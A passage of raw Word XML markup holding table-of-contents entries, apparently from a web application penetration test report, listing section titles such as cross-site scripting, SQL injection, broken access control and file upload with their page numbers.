            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proof-of-Concept Exploitation and Post Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100247 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D9FFDD9" w14:textId="7717EEB5"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48" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cross-Site Scripting (XSS)</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100248 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DDA5EBF" w14:textId="67436547"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49" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Website Defacement</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100249 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D71BB54" w14:textId="5DDD5A12"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50" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Fake Login Page</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100250 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F2C353F" w14:textId="307BD4E9"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51" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.3.</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100251 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E038069" w14:textId="66C451D9"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52" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100252 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="776223C4" w14:textId="6E7CEF53"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53" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unauthorized Deletion</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100253 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B031E6D" w14:textId="6B5CAF18"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54" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unauthorized Access of Information</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100254 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11B2F7C5" w14:textId="3A2A0488"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55" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100255 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19D7EE93" w14:textId="414180CE"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56" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100256 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BE8451D" w14:textId="4E44AAFE"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57" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100257 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68B0167D" w14:textId="6D5ACE17"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58" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Broken Authentication</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100258 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="465BB903" w14:textId="0B312E4B"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59" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100259 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47D58EBE" w14:textId="1F5CF6B6"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60" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Unrestricted File Upload</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100260 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66D1E304" w14:textId="29869105" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100261" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
